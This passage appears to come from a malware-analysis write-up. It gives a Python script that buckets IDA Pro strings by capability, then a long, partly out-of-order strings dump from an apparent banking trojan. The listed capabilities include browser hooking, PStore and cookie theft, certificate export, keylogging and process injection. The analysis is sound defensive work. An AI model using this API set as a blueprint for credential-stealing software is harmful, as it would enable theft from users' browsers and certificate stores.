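    "loader / injection": {
        "LdrLoadDll", "LdrGetProcedureAddress", "LdrGetDllHandle",
        "NtCreateThread", "RtlCreateUserThread", "ReadProcessMemory",
    },
    "file hiding hook": {"NtQueryDirectoryFile"},
    "credential / cookie / certificate theft": {
        "pstorec.dll", "PStoreCreateInstance", "InternetGetCookieA",
        "PFXExportCertStore", "CertOpenSystemStoreW",
        "CertEnumCertificatesInStore", "FindFirstUrlCacheEntryW",
    },
    "keylogging / screen capture": {
        "GetKeyboardState", "ToUnicode", "GetKeyState",
        "GetForegroundWindow", "GetCursorPos", "DrawIcon",
    },
    "token / privilege manipulation": {
        "OpenProcessToken", "AdjustTokenPrivileges", "DuplicateTokenEx",
        "CreateProcessAsUserW", "LookupPrivilegeValueW",
    },
    "service control": {
        "OpenSCManagerW", "OpenSCManagerA", "CreateServiceW", "CreateServiceA",
        "OpenServiceW", "OpenServiceA", "DeleteService", "ControlService",
    },
    "SOCKS proxy": {"socks"},
    "CryptoAPI": {
        "CryptAcquireContextW", "CryptAcquireContextA", "CryptCreateHash",
        "CryptHashData", "CryptGetHashParam", "CryptDestroyHash",
        "CryptReleaseContext",
    },
}


def parse_string_rows(text):
    """Return (address, size, string) triples for every Strings-window row."""
    rows = []
    for line in text.splitlines():
        m = STRING_ROW.match(line.strip())
        if m:
            rows.append((int(m["addr"], 16), int(m["size"], 16), m["text"]))
    return rows


def parse_name_rows(text):
    """Return {address: ida_name} from Names-window rows (1 or 2 pairs/line)."""
    return {int(addr, 16): name for name, addr in NAME_PAIR.findall(text)}


def size_matches(string, size):
    """IDA's size column counts bytes including the NUL terminator; the
    listing prints C escapes (backslash-n, doubled backslashes), so decode
    them before comparing. A mismatch flags a damaged or mis-split row."""
    decoded = string.encode("latin-1").decode("unicode_escape")
    return len(decoded) + 1 == size


def resolve_names(names_text, strings_text):
    """Map truncated auto-names (aCryptacquire_0) to the full string at the
    same address, using the Strings window as ground truth."""
    strings = {addr: s for addr, _, s in parse_string_rows(strings_text)}
    return {name: strings[addr]
            for addr, name in parse_name_rows(names_text).items()
            if addr in strings}


def triage(strings_text):
    """Bucket strings by capability; unmatched strings are returned separately
    so the analyst can inspect them (config paths, format strings, markers)."""
    hits, unclassified = defaultdict(set), []
    for _, _, s in parse_string_rows(strings_text):
        for label, names in CAPABILITIES.items():
            if s in names:
                hits[label].add(s)
                break
        else:
            unclassified.append(s)
    return {k: sorted(v) for k, v in hits.items()}, unclassified


# Sample rows copied from the listing on this page (constructed input).
NAMES_SAMPLE = """\
aCryptacquire_0 0041E22C aCryptacquire_1 0041E244
aCreateservicew 0041E25C
"""
STRINGS_SAMPLE = r"""
.text:004046FC 0000000A C nspr4.dll
.text:00404708 00000009 C PR_Write
.text:0040472C 0000000B C \nPath: %s\n
.text:00404768 00000015 C PStoreCreateInstance
.text:00405340 00000013 C HttpSendRequestExA
.text:00405390 00000015 C NtQueryDirectoryFile
.text:004053C0 0000000B C LdrLoadDll
.text:0040543C 0000002A C software\\microsoft\\internet explorer\\main
.text:00405694 00000006 C socks
.text:00405930 00000011 C GetKeyboardState
.text:00405B1C 00000015 C CreateProcessAsUserW
.text:0041E22C 00000015 C CryptAcquireContextW
.text:0041E244 00000015 C CryptAcquireContextA
.text:0041E25C 0000000F C CreateServiceW
"""

if __name__ == "__main__":
    for name, full in resolve_names(NAMES_SAMPLE, STRINGS_SAMPLE).items():
        print(f"{name:16} -> {full}")
    buckets, rest = triage(STRINGS_SAMPLE)
    for label, names in buckets.items():
        print(f"[{label}] {', '.join(names)}")
    print("unclassified:", rest)
```

Run against the full dump rather than the sample, the unclassified list is where the interesting material sits: the registry path under Internet Explorer, the format strings that shape the stolen data, and the 16-byte strings with no API meaning, which deserve a closer look in the disassembly before any label is attached to them.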

Comment Strings:

.text:0040429C 0000002E C -!This program cannot be run in DOS mode.\r\r\n$

.text:004046FC 0000000A C nspr4.dll

.text:00404708 00000009 C PR_Write

.text:00404714 00000011 C PopOpO03-3331111

.text:0040472C 0000000B C \nPath: %s\n

.text:00404738 00000007 C %s=%s\n

.text:00404768 00000015 C PStoreCreateInstance

.text:00404780 0000000C C pstorec.dll

.text:004047A4 0000000E C \nIE Cookies:\n

.text:004047B4 00000006 C Empty

.text:0041D120 0000001C C RegisterServiceCtrlHandlerA

.text:0041D13C 00000015 C RegisterEventSourceW

.text:0041D154 00000015 C RegisterEventSourceA

.text:0041D16C 0000000E C RegUnLoadKeyW

.text:0041D17C 0000000E C RegUnLoadKeyA

.text:0041D18C 0000000D C RegSetValueW

.text:0041D19C 0000000F C RegSetValueExW

.text:0041D1AC 0000000F C RegSetValueExA

.text:0041D1BC 0000000D C RegSetValueA

.text:0041D1CC 00000012 C RegSetKeySecurity

.text:0041D1E0 0000000C C RegSaveKeyW


.text:00405278 00000011 C TranslateMessage

.text:0040528C 0000000B C WSAConnect

.text:00405298 00000008 C connect

.text:004052A0 0000000C C closesocket

.text:004052AC 00000005 C send

.text:004052B4 0000000F C HttpQueryInfoW

.text:004052C4 0000000F C HttpQueryInfoA

.text:004052D4 00000014 C InternetCloseHandle

.text:004052E8 0000001B C InternetQueryDataAvailable

.text:00405304 00000014 C InternetReadFileExA

.text:00405318 00000014 C InternetReadFileExW

.text:0040532C 00000011 C InternetReadFile

.text:00405340 00000013 C HttpSendRequestExA

.text:00405354 00000013 C HttpSendRequestExW

.text:00405368 00000011 C HttpSendRequestA

.text:0040537C 00000011 C HttpSendRequestW

.text:00405390 00000015 C NtQueryDirectoryFile

.text:004053A8 00000017 C LdrGetProcedureAddress

.text:004053C0 0000000B C LdrLoadDll

.text:004053CC 0000000F C NtCreateThread

.text:004053EC 00000011 C 09ck_=ldfuihpfre

.text:00405400 00000011 C 3709128dk0023444

.text:0040541C 00000011 C !!!0-0=9-0=23434

.text:00405430 0000000B C Start Page

.text:0040543C 0000002A C software\\microsoft\\internet explorer\\main

.text:00405468 00000011 C ~23324m'm434dKkl

.text:0040547C 00000011 C 3208()_*09303333

.text:004054A8 00000005 C GET

.text:004054B0 00000006 C POST

.text:004054B8 00000008 C HTTP/1.

.text:004054C0 00000005 C Host

.text:004054C8 0000000F C PR_GetPeerName

.text:004054D8 00000008 C Referer

.text:004054E0 0000000D C Content-Type

.text:004054F0 00000016 C PR_GetNameForIdentity

.text:00405508 0000000A C NSS layer

.text:00405514 00000009 C https://

.text:00405520 00000008 C http://

.text:00405528 0000000C C %u.%u.%u.%u

.text:0040553C 00000005 C POST

.text:00405544 0000000F C GetProcAddress

.text:00405554 0000000D C LoadLibraryA

.text:00405564 00000011 C 0928394074595794

.text:00405578 00000011 C 809dslffsdfsdfgg

.text:0040558C 00000011 C M<,,>Keolkp90344

.text:004055A4 0000001C C Unknown command at line %u.

.text:004055C0 00000019 C Syntax error at line %u.

.text:004055DC 00000019 C Script already executed.

.text:004055F8 00000023 C Internal command error at line %u.

.text:00405694 00000006 C socks

.text:0040569C 00000011 C !213KJhndkmnihjd

.text:004056B0 00000009 C %s|%s|%s

.text:004056BC 0000000F C GetUserNameExW

.text:004056CC 00000013 C PFXExportCertStore

.text:004056E0 00000020 C CertDuplicateCertificateContext

.text:00405702 0000001D C rtDeleteCertificateFromStore

.text:00405720 00000014 C CertEnumSystemStore

.text:00405735 0000001B C ertEnumCertificatesInStore

.text:00405750 0000000F C CertCloseStore

.text:00405760 00000015 C CertOpenSystemStoreW

.text:00405778 00000010 C CLSIDFromString

.text:00405788 00000010 C StringFromGUID2

.text:00405798 00000011 C CoCreateInstance

.text:004057AC 0000000F C GetWindowTextW

.text:004057BC 0000000E C GetClassNameW

.text:004057CC 0000000F C GetWindowLongW

.text:004057DC 0000000D C SendMessageW

.text:004057EC 0000000E C FindWindowExW

.text:004057FC 00000010 C GetDlgItemTextW

.text:0040580C 00000010 C GetDlgItemTextA

.text:0041D1EC 0000000C C RegSaveKeyA

.text:0041D1F8 0000000F C RegRestoreKeyW

.text:0041D208 0000000F C RegRestoreKeyA

.text:0041D218 0000000F C RegReplaceKeyW

.text:0041D228 0000000F C RegReplaceKeyA

.text:0041D238 0000000F C RegQueryValueW

.text:0041D248 00000011 C RegQueryValueExW

.text:0041D25C 00000011 C RegQueryValueExA

.text:0041D270 0000000F C RegQueryValueA

.text:0041D280 00000018 C RegQueryMultipleValuesW

.text:0041D298 00000018 C RegQueryMultipleValuesA

.text:0041D2B0 00000011 C RegQueryInfoKeyW

.text:0041D2C4 00000011 C RegQueryInfoKeyA

.text:0041D2D8 0000000C C RegOpenKeyW

.text:0041D2E4 0000000E C RegOpenKeyExW

.text:0041D2F4 0000000E C RegOpenKeyExA

.text:0041D304 0000000C C RegOpenKeyA

.text:0041D310 00000018 C RegNotifyChangeKeyValue

.text:0041D328 0000000C C RegLoadKeyW

.text:0041D334 0000000C C RegLoadKeyA

.text:0041D340 00000012 C RegGetKeySecurity

.text:0041D354 0000000C C RegFlushKey

.text:0041D360 0000000E C RegEnumValueW

.text:0041D370 0000000E C RegEnumValueA

.text:0041D380 0000000C C RegEnumKeyW

.text:0041D38C 0000000E C RegEnumKeyExW

.text:0041D39C 0000000E C RegEnumKeyExA

.text:0041D3AC 0000000C C RegEnumKeyA

.text:0041D3B8 00000010 C RegDeleteValueW

.text:0041D3C8 00000010 C RegDeleteValueA

.text:0041D3D8 0000000E C RegDeleteKeyW

.text:0041D3E8 0000000E C RegDeleteKeyA

.text:0041D3F8 0000000E C RegCreateKeyW

.text:0041D408 00000010 C RegCreateKeyExW

.text:0041D418 00000010 C RegCreateKeyExA

.text:0041D428 0000000E C RegCreateKeyA

.text:0041D438 00000014 C RegConnectRegistryW

.text:0041D44C 00000014 C RegConnectRegistryA

.text:0041D460 0000000C C RegCloseKey

.text:0041D46C 0000000E C ReadEventLogW

.text:0041D47C 0000000E C ReadEventLogA

.text:0041D48C 00000013 C QueryServiceStatus

.text:0041D4A0 0000001B C QueryServiceObjectSecurity

.text:0041D4BC 00000018 C QueryServiceLockStatusW

.text:0041D4D4 00000018 C QueryServiceLockStatusA

.text:0041D4EC 00000014 C QueryServiceConfigW

.text:0041D500 00000014 C QueryServiceConfigA

.text:0041D514 0000001D C PrivilegedServiceAuditAlarmW

.text:0041D534 0000001D C PrivilegedServiceAuditAlarmA

.text:0041D554 0000000F C PrivilegeCheck

.text:0041D564 00000010 C OpenThreadToken

.text:0041D574 0000000D C OpenServiceW

.text:0041D584 0000000D C OpenServiceA

.text:0041D594 0000000F C OpenSCManagerW

.text:0041D5A4 0000000F C OpenSCManagerA

.text:0041D5B4 00000011 C OpenProcessToken

.text:0041D5C8 0000000E C OpenEventLogW

.text:0041D5D8 0000000E C OpenEventLogA

.text:0041D5E8 00000014 C OpenBackupEventLogW

.text:0041D5FC 00000014 C OpenBackupEventLogA

.text:0041D610 0000001B C ObjectPrivilegeAuditAlarmW

.text:0041D62C 0000001B C ObjectPrivilegeAuditAlarmA

.text:0041D648 00000016 C ObjectOpenAuditAlarmW

.text:0041D660 00000016 C ObjectOpenAuditAlarmA

.text:0041D678 00000018 C ObjectDeleteAuditAlarmW

.text:0041D690 00000018 C ObjectDeleteAuditAlarmA

.text:0041D6A8 00000017 C ObjectCloseAuditAlarmW

.text:0041D6C0 00000017 C ObjectCloseAuditAlarmA

.text:0041D6D8 00000015 C NotifyChangeEventLog

.text:0041D6F0 00000017 C NotifyBootConfigStatus


.text:0040581C 0000000B C GetDlgItem

.text:00405828 0000000C C GetIconInfo

.text:00405834 00000009 C DrawIcon

.text:00405840 0000000D C GetCursorPos

.text:00405850 0000000C C LoadCursorW

.text:0040585C 00000011 C SetThreadDesktop

.text:00405870 0000000D C CloseDesktop

.text:00405880 0000000D C OpenDesktopA

.text:00405890 00000018 C SetProcessWindowStation

.text:004058A8 00000013 C CloseWindowStation

.text:004058BC 00000013 C OpenWindowStationA

.text:004058D0 00000014 C GetForegroundWindow

.text:004058E4 00000019 C GetWindowThreadProcessId

.text:00405900 00000011 C DispatchMessageW

.text:00405914 0000001A C MsgWaitForMultipleObjects

.text:00405930 00000011 C GetKeyboardState

.text:00405944 0000000A C ToUnicode

.text:00405950 0000000C C GetKeyState

.text:0040595C 00000011 C DispatchMessageA

.text:00405970 0000000D C PeekMessageW

.text:00405980 0000000F C CharLowerBuffA

.text:00405990 0000000E C ExitWindowsEx

.text:004059A0 0000000B C CharToOemW

.text:004059AC 0000000B C CharUpperW

.text:004059B8 00000010 C WSAGetLastError

.text:004059C8 00000010 C WSASetLastError

.text:004059D8 00000007 C select

.text:004059E0 00000009 C WSAIoctl

.text:004059EC 00000005 C recv

.text:004059F4 00000009 C recvfrom

.text:00405A00 0000000C C getsockname

.text:00405A0C 0000000D C freeaddrinfo

.text:00405A1C 0000000C C getaddrinfo

.text:00405A28 00000009 C shutdown

.text:00405A34 0000000B C WSACleanup

.text:00405A40 0000000B C WSAStartup

.text:00405A4C 00000007 C accept

.text:00405A54 00000007 C listen

.text:00405A5C 00000005 C bind

.text:00405A64 00000007 C socket

.text:00405A6C 0000000C C getpeername

.text:00405A78 00000007 C sendto

.text:00405A80 0000000A C WSASendTo

.text:00405A8C 00000008 C WSASend

.text:00405A94 00000014 C CryptReleaseContext

.text:00405AA8 00000011 C CryptDestroyHash

.text:00405ABC 00000012 C CryptGetHashParam

.text:00405AD0 0000000E C CryptHashData

.text:00405AE0 00000010 C CryptCreateHash

.text:00405AF0 00000015 C CryptAcquireContextW

.text:00405B08 00000011 C DuplicateTokenEx

.text:00405B1C 00000015 C CreateProcessAsUserW

.text:00405B34 0000001A C SetSecurityDescriptorDacl

.text:00405B50 0000001D C InitializeSecurityDescriptor

.text:00405B70 0000000E C RegEnumKeyExW

.text:00405B80 00000010 C RegDeleteValueW

.text:00405B90 0000000F C RegSetValueExA

.text:00405BA0 0000000F C RegSetValueExW

.text:00405BB0 0000000C C RegCloseKey

.text:00405BBC 0000000E C RegOpenKeyExW

.text:00405BCC 00000010 C RegCreateKeyExA

.text:00405BDC 00000010 C RegCreateKeyExW

.text:00405BEC 00000011 C RegQueryValueExW

.text:00405C00 00000012 C LookupAccountSidW

.text:00405C14 00000014 C GetTokenInformation

.text:00405C28 00000011 C OpenProcessToken

.text:00405C3C 00000016 C AdjustTokenPrivileges

.text:00405C54 00000016 C LookupPrivilegeValueW

.text:00405C6C 0000000D C GetUserNameW

.text:00405C7C 00000015 C DeleteUrlCacheEntryW

.text:0041D708 0000000F C MapGenericMask

.text:0041D718 00000013 C MakeSelfRelativeSD

.text:0041D72C 0000000F C MakeAbsoluteSD

.text:0041D73C 0000001F C LookupSecurityDescriptorPartsW

.text:0041D75C 0000001F C LookupSecurityDescriptorPartsA

.text:0041D77C 00000016 C LookupPrivilegeValueW

.text:0041D794 00000016 C LookupPrivilegeValueA

.text:0041D7AC 00000015 C LookupPrivilegeNameW

.text:0041D7C4 00000015 C LookupPrivilegeNameA

.text:0041D7DC 0000001C C LookupPrivilegeDisplayNameW

.text:0041D7F8 0000001C C LookupPrivilegeDisplayNameA

.text:0041D814 00000012 C LookupAccountSidW

.text:0041D828 00000012 C LookupAccountSidA

.text:0041D83C 00000013 C LookupAccountNameW

.text:0041D850 00000013 C LookupAccountNameA

.text:0041D864 0000000B C LogonUserW

.text:0041D870 0000000B C LogonUserA

.text:0041D87C 00000014 C LockServiceDatabase

.text:0041D890 0000000B C IsValidSid

.text:0041D89C 0000001A C IsValidSecurityDescriptor

.text:0041D8B8 0000000B C IsValidAcl

.text:0041D8C4 0000000E C IsTextUnicode

.text:0041D8D4 00000018 C InitiateSystemShutdownW

.text:0041D8EC 00000018 C InitiateSystemShutdownA

.text:0041D904 0000000E C InitializeSid

.text:0041D914 0000001D C InitializeSecurityDescriptor

.text:0041D934 0000000E C InitializeAcl

.text:0041D944 00000010 C ImpersonateSelf

.text:0041D954 0000001B C ImpersonateNamedPipeClient

.text:0041D970 00000018 C ImpersonateLoggedOnUser

.text:0041D988 0000000D C GetUserNameW

.text:0041D998 0000000D C GetUserNameA

.text:0041D9A8 00000010 C GetTrusteeTypeW

.text:0041D9B8 00000010 C GetTrusteeTypeA

.text:0041D9C8 00000010 C GetTrusteeNameW

.text:0041D9D8 00000010 C GetTrusteeNameA

.text:0041D9E8 00000014 C GetTokenInformation

.text:0041D9FC 00000018 C GetSidSubAuthorityCount

.text:0041DA14 00000013 C GetSidSubAuthority

.text:0041DA28 00000015 C GetSidLengthRequired

.text:0041DA40 0000001A C GetSidIdentifierAuthority

.text:0041DA5C 00000013 C GetServiceKeyNameW

.text:0041DA70 00000013 C GetServiceKeyNameA

.text:0041DA84 00000017 C GetServiceDisplayNameW

.text:0041DA9C 00000017 C GetServiceDisplayNameA

.text:0041DAB4 00000013 C GetSecurityInfoExW

.text:0041DAC8 00000013 C GetSecurityInfoExA

.text:0041DADC 00000010 C GetSecurityInfo

.text:0041DAEC 0000001A C GetSecurityDescriptorSacl

.text:0041DB08 0000001B C GetSecurityDescriptorOwner

.text:0041DB24 0000001C C GetSecurityDescriptorLength

.text:0041DB40 0000001B C GetSecurityDescriptorGroup

.text:0041DB5C 0000001A C GetSecurityDescriptorDacl

.text:0041DB78 0000001D C GetSecurityDescriptorControl

.text:0041DB98 00000019 C GetPrivateObjectSecurity

.text:0041DBB4 0000001B C GetOverlappedAccessResults

.text:0041DBD0 00000018 C GetOldestEventLogRecord

.text:0041DBE8 0000001B C GetNumberOfEventLogRecords

.text:0041DC04 00000016 C GetNamedSecurityInfoW

.text:0041DC1C 00000018 C GetNamedSecurityInfoExW

.text:0041DC34 00000018 C GetNamedSecurityInfoExA

.text:0041DC4C 00000016 C GetNamedSecurityInfoA

.text:0041DC64 00000014 C GetMultipleTrusteeW

.text:0041DC78 0000001D C GetMultipleTrusteeOperationW

.text:0041DC98 0000001D C GetMultipleTrusteeOperationA

.text:0041DCB8 00000014 C GetMultipleTrusteeA

.text:0041DCCC 0000000D C GetLengthSid

.text:0041DCDC 00000018 C GetKernelObjectSecurity

.text:0041DCF4 00000011 C GetFileSecurityW

.text:0041DD08 00000011 C GetFileSecurityA


.text:00405C94 00000012 C FindCloseUrlCache

.text:00405CA8 00000017 C FindNextUrlCacheEntryW

.text:00405CC0 00000018 C FindFirstUrlCacheEntryW

.text:00405CD8 00000013 C InternetSetOptionA

.text:00405CEC 0000001A C InternetSetStatusCallback

.text:00405D08 00000016 C GetUrlCacheEntryInfoW

.text:00405D20 00000017 C HttpAddRequestHeadersA

.text:00405D38 00000017 C HttpAddRequestHeadersW

.text:00405D50 00000015 C InternetQueryOptionA

.text:00405D68 00000019 C InternetCheckConnectionA

.text:00405D84 00000012 C InternetCrackUrlA

.text:00405D98 00000011 C HttpOpenRequestA

.text:00405DAC 00000011 C InternetConnectA

.text:00405DC0 00000011 C InternetOpenUrlA

.text:00405DD4 0000000E C InternetOpenA

.text:00405DE4 00000013 C InternetGetCookieA

.text:00405DF8 00000015 C GetModuleFileNameExW

.text:00405E10 0000000D C SHDeleteKeyA

.text:00405E20 0000000F C PathMatchSpecW

.text:00405E30 00000014 C PathRemoveFileSpecW

.text:00405E44 00000010 C PathFileExistsW

.text:00405E54 0000000E C PathSkipRootW

.text:00405E64 00000015 C PathRemoveBackslashW

.text:00405E7C 00000012 C PathAddExtensionW

.text:00405E90 00000012 C PathAddBackslashW

.text:00405EA4 00000012 C PathFindFileNameW

.text:00405EB8 0000000D C PathCombineW

.text:00405EC8 0000000B C wnsprintfA

.text:00405ED4 0000000B C wnsprintfW

.text:00405EE0 0000000C C wvnsprintfA

.text:00405EEC 0000000C C wvnsprintfW

.text:00405EF8 0000000A C StrCmpNIW

.text:00405F04 0000000A C StrCmpNIA

.text:00405F10 00000009 C StrStrIA

.text:00405F1C 00000008 C StrStrW

.text:00405F24 00000014 C RtlCreateUserThread

.text:00405F38 00000010 C LdrGetDllHandle

.text:00405F48 0000001A C NtQueryInformationProcess

.text:00405F64 0000000D C NtCreateFile

.text:00405F74 0000000E C NtQueryObject

.text:00405F84 0000000E C ShellExecuteW

.text:00405F94 00000011 C SHGetFolderPathW

.text:00405FA8 00000018 C SHGetSpecialFolderPathW

.text:00405FC0 0000000E C FindResourceW

.text:00405FD0 0000001A C ExpandEnvironmentStringsW

.text:00405FEC 0000000D C GlobalUnlock

.text:00405FFC 0000000B C GlobalLock

.text:00406008 0000000C C GetFileTime

.text:00406014 0000000C C SetFileTime

.text:00406020 00000011 C GetComputerNameW

.text:00406034 0000000A C FindClose

.text:00406040 0000000E C FindNextFileW

.text:00406050 0000000F C FindFirstFileW

.text:00406060 00000011 C GetTempFileNameW

.text:00406074 00000015 C SystemTimeToFileTime

.text:0040608C 0000000E C GetSystemTime

.text:0040609C 00000015 C LeaveCriticalSection

.text:004060B4 00000015 C EnterCriticalSection

.text:004060CC 0000001A C InitializeCriticalSection

.text:004060E8 00000012 C ReadProcessMemory

.text:004060FC 0000000D C SetLastError

.text:0040610C 0000000E C IsBadWritePtr

.text:0040611C 0000000D C IsBadReadPtr

.text:0040612C 0000000D C GetTempPathW

.text:0040613C 00000011 C CreateDirectoryW

.text:00406150 0000000C C MoveFileExW

.text:0040615C 00000014 C WideCharToMultiByte

.text:00406170 00000014 C MultiByteToWideChar

.text:00406184 00000010 C GetProcessTimes

.text:00406194 0000000F C CreateProcessW

.text:0041DD1C 0000001B C GetExplicitEntriesFromAclW

.text:0041DD38 0000001B C GetExplicitEntriesFromAclA

.text:0041DD54 0000001B C GetEffectiveRightsFromAclW

.text:0041DD70 0000001B C GetEffectiveRightsFromAclA

.text:0041DD8C 00000015 C GetCurrentHwProfileW

.text:0041DDA4 00000015 C GetCurrentHwProfileA

.text:0041DDBC 0000001E C GetAuditedPermissionsFromAclW

.text:0041DDDC 0000001E C GetAuditedPermissionsFromAclA

.text:0041DDFC 00000012 C GetAclInformation

.text:0041DE10 00000007 C GetAce

.text:0041DE18 0000001F C GetAccessPermissionsForObjectW

.text:0041DE38 0000001F C GetAccessPermissionsForObjectA

.text:0041DE58 00000008 C FreeSid

.text:0041DE60 00000011 C FindFirstFreeAce

.text:0041DE74 00000009 C EqualSid

.text:0041DE80 0000000F C EqualPrefixSid

.text:0041DE90 00000014 C EnumServicesStatusW

.text:0041DEA4 00000014 C EnumServicesStatusA

.text:0041DEB8 00000017 C EnumDependentServicesW

.text:0041DED0 00000017 C EnumDependentServicesA

.text:0041DEE8 00000011 C DuplicateTokenEx

.text:0041DEFC 0000000F C DuplicateToken

.text:0041DF0C 0000001D C DestroyPrivateObjectSecurity

.text:0041DF2C 00000016 C DeregisterEventSource

.text:0041DF44 0000000E C DeleteService

.text:0041DF54 0000000A C DeleteAce

.text:0041DF60 00000016 C CryptVerifySignatureW

.text:0041DF78 00000016 C CryptVerifySignatureA

.text:0041DF90 0000000F C CryptSignHashW

.text:0041DFA0 0000000F C CryptSignHashA

.text:0041DFB0 00000012 C CryptSetProviderW

.text:0041DFC4 00000014 C CryptSetProviderExW

.text:0041DFD8 00000014 C CryptSetProviderExA

.text:0041DFEC 00000012 C CryptSetProviderA

.text:0041E000 00000012 C CryptSetProvParam

.text:0041E014 00000011 C CryptSetKeyParam

.text:0041E028 00000012 C CryptSetHashParam

.text:0041E03C 00000014 C CryptReleaseContext

.text:0041E050 0000000F C CryptImportKey

.text:0041E060 00000014 C CryptHashSessionKey

.text:0041E074 0000000E C CryptHashData

.text:0041E084 00000010 C CryptGetUserKey

.text:0041E094 00000012 C CryptGetProvParam

.text:0041E0A8 00000011 C CryptGetKeyParam

.text:0041E0BC 00000012 C CryptGetHashParam

.text:0041E0D0 00000019 C CryptGetDefaultProviderW

.text:0041E0EC 00000019 C CryptGetDefaultProviderA

.text:0041E108 0000000F C CryptGenRandom

.text:0041E118 0000000C C CryptGenKey

.text:0041E124 0000000F C CryptExportKey

.text:0041E134 00000014 C CryptEnumProvidersW

.text:0041E148 00000014 C CryptEnumProvidersA

.text:0041E15C 00000018 C CryptEnumProviderTypesW

.text:0041E174 00000018 C CryptEnumProviderTypesA

.text:0041E18C 0000000D C CryptEncrypt

.text:0041E19C 00000012 C CryptDuplicateKey

.text:0041E1B0 00000013 C CryptDuplicateHash

.text:0041E1C4 00000010 C CryptDestroyKey

.text:0041E1D4 00000011 C CryptDestroyHash

.text:0041E1E8 0000000F C CryptDeriveKey

.text:0041E1F8 0000000D C CryptDecrypt

.text:0041E208 00000010 C CryptCreateHash

.text:0041E218 00000013 C CryptContextAddRef

.text:0041E22C 00000015 C CryptAcquireContextW

.text:0041E244 00000015 C CryptAcquireContextA

.text:0041E25C 0000000F C CreateServiceW

.text:0041E26C 0000000F C CreateServiceA

.text:0041E27C 00000015 C CreateProcessAsUserW

.text:0041E294 00000015 C CreateProcessAsUserA

.text:0041E2AC 0000001C C CreatePrivateObjectSecurity

.text:004061A4 00000013 C GetCurrentThreadId

.text:004061B8 00000011 C GetCurrentThread

.text:004061CC 00000012 C GetThreadPriority

.text:004061E0 00000012 C SetThreadPriority

.text:004061F4 00000014 C GetCurrentProcessId

.text:00406208 0000000E C VirtualFreeEx

.text:00406218 00000011 C VirtualProtectEx

.text:0040622C 0000000F C VirtualAllocEx

.text:0040623C 0000000F C VirtualQueryEx

.text:0040624C 0000000C C OpenProcess

.text:00406258 0000000C C ExitProcess

.text:00406264 0000000B C ExitThread

.text:00406270 00000013 C GetExitCodeProcess

.text:00406284 0000000D C Thread32Next

.text:00406294 0000000E C Thread32First

.text:004062A4 0000000E C Module32NextW

.text:004062B4 0000000F C Module32FirstW

.text:004062C4 0000000F C Process32NextW

.text:004062D4 00000010 C Process32FirstW

.text:004062E4 00000019 C CreateToolhelp32Snapshot

.text:00406300 00000013 C CreateRemoteThread

.text:00406314 0000000D C CreateThread

.text:00406324 00000013 C WriteProcessMemory

.text:00406338 00000014 C DisconnectNamedPipe

.text:0040634C 0000000D C GetLocalTime

.text:0040635C 00000011 C FlushFileBuffers

.text:00406370 0000000C C GetFileSize

.text:0040637C 0000000D C SetEndOfFile

.text:0040638C 00000009 C ReadFile

.text:00406398 0000000A C WriteFile

.text:004063A4 0000000D C GetTickCount

.text:004063B4 00000011 C CreateNamedPipeW

.text:004063C8 00000018 C SetNamedPipeHandleState

.text:004063E0 0000000F C WaitNamedPipeW

.text:004063F0 00000011 C ConnectNamedPipe

.text:00406404 00000009 C HeapFree

.text:00406410 0000000C C HeapReAlloc

.text:0040641C 0000000A C HeapAlloc

.text:00406428 0000000C C HeapDestroy

.text:00406434 0000000B C HeapCreate

.text:00406440 0000000F C SetFilePointer

.text:00406450 0000000D C CreateEventW

.text:00406460 0000000C C CreateFileW

.text:0040646C 00000009 C SetEvent

.text:00406478 00000014 C WaitForSingleObject

.text:0040648C 00000013 C SetFileAttributesW

.text:004064A0 0000000C C DeleteFileW

.text:004064AC 0000000C C CloseHandle

.text:004064B8 00000009 C lstrcatA

.text:004064C4 00000009 C lstrcatW

.text:004064D0 00000009 C lstrcpyA

.text:004064DC 0000000A C lstrcpynA

.text:004064E8 0000000A C lstrcpynW

.text:004064F4 00000009 C lstrcpyW

.text:00406500 0000000A C lstrcmpiA

.text:0040650C 0000000A C lstrcmpiW

.text:00406518 0000000D C ReleaseMutex

.text:00406528 0000000B C OpenMutexW

.text:00406534 0000000D C CreateMutexW

.text:00406544 0000000D C GetLastError

.text:00406554 00000011 C SetFilePointerEx

.text:00406568 00000013 C GetModuleFileNameA

.text:0040657C 00000013 C GetModuleFileNameW

.text:00406590 0000000A C CopyFileW

.text:0040659C 00000006 C Sleep

.text:004065A4 00000011 C GetModuleHandleA

.text:004065B8 00000019 C GetUserDefaultUILanguage

.text:004065D4 0000000E C GetVersionExW

.text:004065E4 00000017 C GetTimeZoneInformation

.text:004065FC 0000000B C ResetEvent

.text:0041E2C8 00000008 C CopySid

.text:0041E2D0 00000023 C ConvertSecurityDescriptorToAccessW

.text:0041E2F4 00000028 C ConvertSecurityDescriptorToAccessNamedW

.text:0041E31C 00000028 C ConvertSecurityDescriptorToAccessNamedA

.text:0041E344 00000023 C ConvertSecurityDescriptorToAccessA

.text:0041E368 00000023 C ConvertAccessToSecurityDescriptorW

.text:0041E38C 00000023 C ConvertAccessToSecurityDescriptorA

.text:0041E3B0 0000000F C ControlService

.text:0041E3C0 00000013 C CloseServiceHandle

.text:0041E3D4 0000000E C CloseEventLog

.text:0041E3E4 0000000F C ClearEventLogW

.text:0041E3F4 0000000F C ClearEventLogA

.text:0041E404 00000015 C ChangeServiceConfigW

.text:0041E41C 00000015 C ChangeServiceConfigA

.text:0041E434 00000017 C CancelOverlappedAccess

.text:0041E44C 00000015 C BuildTrusteeWithSidW

.text:0041E464 00000015 C BuildTrusteeWithSidA

.text:0041E47C 00000016 C BuildTrusteeWithNameW

.text:0041E494 00000016 C BuildTrusteeWithNameA

.text:0041E4AC 00000019 C BuildSecurityDescriptorW

.text:0041E4C8 00000019 C BuildSecurityDescriptorA

.text:0041E4E4 00000019 C BuildImpersonateTrusteeW

.text:0041E500 00000019 C BuildImpersonateTrusteeA

.text:0041E51C 00000028 C BuildImpersonateExplicitAccessWithNameW

.text:0041E544 00000028 C BuildImpersonateExplicitAccessWithNameA

.text:0041E56C 0000001D C BuildExplicitAccessWithNameW

.text:0041E58C 0000001D C BuildExplicitAccessWithNameA

.text:0041E5AC 00000010 C BackupEventLogW

.text:0041E5BC 00000010 C BackupEventLogA

.text:0041E5CC 00000016 C AreAnyAccessesGranted

.text:0041E5E4 00000016 C AreAllAccessesGranted

.text:0041E5FC 00000018 C AllocateLocallyUniqueId

.text:0041E614 00000019 C AllocateAndInitializeSid

.text:0041E630 00000016 C AdjustTokenPrivileges

.text:0041E648 00000012 C AdjustTokenGroups

.text:0041E65C 00000012 C AddAuditAccessAce

.text:0041E670 00000007 C AddAce

.text:0041E678 00000013 C AddAccessDeniedAce

